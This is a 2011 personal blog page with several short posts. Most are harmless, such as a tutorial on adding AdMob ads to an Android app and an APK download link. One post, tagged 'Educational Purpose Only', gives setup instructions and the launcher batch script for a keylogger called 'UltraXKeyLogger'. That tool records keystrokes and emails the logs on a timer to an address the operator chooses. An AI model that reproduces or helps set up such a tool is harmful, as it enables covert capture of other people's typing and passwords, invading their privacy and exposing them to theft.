skip to main |
skip to sidebar
RSS Feeds
Nope. nothing .. just some random thoughts come to my mind ...
Nope. nothing .. just some random thoughts come to my mind ...
3:25 PM | Wednesday, November 30, 2011
Posted by harshadura
9:44 AM | Monday, November 28, 2011
Posted by harshadura
[Educational Purpose Only]
############################################ UltraXKeyLogger v0.5 ############################################ --------------------------- Prerequisites --------------------------- (01) Java --------------------------- Configuring the KeyMailer --------------------------- Right Click the "start.bat" and open it with NotePad++ or whatever suitable editor you have! Ok now you will see this text on it! ------------------------------------ @echo off cd dist start Logger.exe & start javaw -jar KeyMailer.jar testEmail@gmail.com 5000 @echo on ------------------------------------ We have to modify few parameters in the 3rd line in order to recieve logs for relavant email Address. ----------------------------------- start Logger.exe & start javaw -jar KeyMailer.jar testEmail@gmail.com 5000 ------------------------------------ well!! I will explain lil bit. ------------------------------------ start Logger.exe & start javaw -jar KeyMailer.jar <Log Recievers Email Address> <Email log recieving time delay> ------------------------------------ *Log Recievers Email Address : put an email of your choice this will reeive the logs. *Email log recieving time delay: the time delay for a Log after a log. [1000 = 1 Second] so this default value implies 5 Seconds. if you need like a 10 Min delay then it should be 1000 X 60 X 10 = 600000 not 1000*60*10 you should calulate it and giv the final value to it. jz said thats it. xD So Adjust them as you like! Save the File properly, And then Jz Run the same "start.bat" You have just started the Keylogger!! Just hit some buttons and check your mails. Voila!! you should recieved the KeyLog!! xD
10:09 PM | Friday, November 25, 2011
Posted by harshadura
12:58 PM | Thursday, November 17, 2011
Posted by harshadura
Ref : http://android.jmsliu.com/209/add-google-admob-in-android-application.html
______________________
Admob is a new way to monetize mobile applications. Currently,
it supports multi-platform, including iPhone, Android, WebOS, and Flash
Lite. Here I will show you how to integrate Admob in your android
applications.
First, we need to go to the Admob website to register an account, in order to get the Admod account ID.
Second, let’s go the google code to download the latest Google AdMob Ads SDK
for android. You also can get download it from your admob “Sites &
Apps” setting page. After we get the AdMob SDK, we need to add the jar
in our android application Build Path. Then, you just need to put some
simple codes to show your ads in your applications.
1. For Admob, it’s better to add the com.google.ads.AdActivity in your Manifest.xml file. And don’t forget to add the user permission for it. Below is my mainfest.xml example.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| <? xml version = "1.0" encoding = "utf-8" ?> < manifest xmlns:android = "http://schemas.android.com/apk/res/android" package = "com.jms.AdmobExample" android:versionCode = "1" android:versionName = "1.0" > < uses-sdk android:minSdkVersion = "8" /> < application android:icon = "@drawable/icon" android:label = "@string/app_name" > < activity android:name = ".AdmobExample" android:label = "@string/app_name" > < intent-filter > < action android:name = "android.intent.action.MAIN" /> < category android:name = "android.intent.category.LAUNCHER" /> </ intent-filter > </ activity > < activity android:name = "com.google.ads.AdActivity" android:configChanges = "keyboard|keyboardHidden|orientation" /> </ application > < uses-permission android:name = "android.permission.INTERNET" /> < uses-permission android:name = "android.permission.ACCESS_NETWORK_STATE" /> </ manifest > |
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| <? xml version = "1.0" encoding = "utf-8" ?> < LinearLayout xmlns:android = "http://schemas.android.com/apk/res/android" android:orientation = "vertical" android:layout_width = "fill_parent" android:layout_height = "fill_parent" > < ImageView android:layout_width = "wrap_content" android:layout_height = "wrap_content" android:src = "@drawable/a" /> < com.google.ads.AdView xmlns:ads = "http://schemas.android.com/apk/res/com.jms.AdmobExample" android:id = "@+id/adView" android:layout_width = "fill_parent" android:layout_height = "fill_parent" ads:adSize = "BANNER" ads:adUnitId = "a14dbba084368db" /> </ LinearLayout > |
1
2
3
4
5
6
7
8
9
10
11
12
| <? xml version = "1.0" encoding = "utf-8" ?> < resources > < declare-styleable name = "com.google.ads.AdView" > < attr name = "adSize" > < enum name = "BANNER" value = "1" /> < enum name = "IAB_MRECT" value = "2" /> < enum name = "IAB_BANNER" value = "3" /> < enum name = "IAB_LEADERBOARD" value = "4" /> </ attr > < attr name = "adUnitId" format = "string" /> </ declare-styleable > </ resources > |
1
2
3
4
5
| AdView adview = (AdView)findViewById(R.id.adView); AdRequest re = new AdRequest(); re.setTesting( true ); re.setGender(AdRequest.Gender.FEMALE); adview.loadAd(re); |
8:38 AM | Tuesday, November 1, 2011
Posted by harshadura
DOWNLOAD > CSE WATCH.APK _______________________________________________________________________________ DOWNLOAD via QR READER |
Screenshot |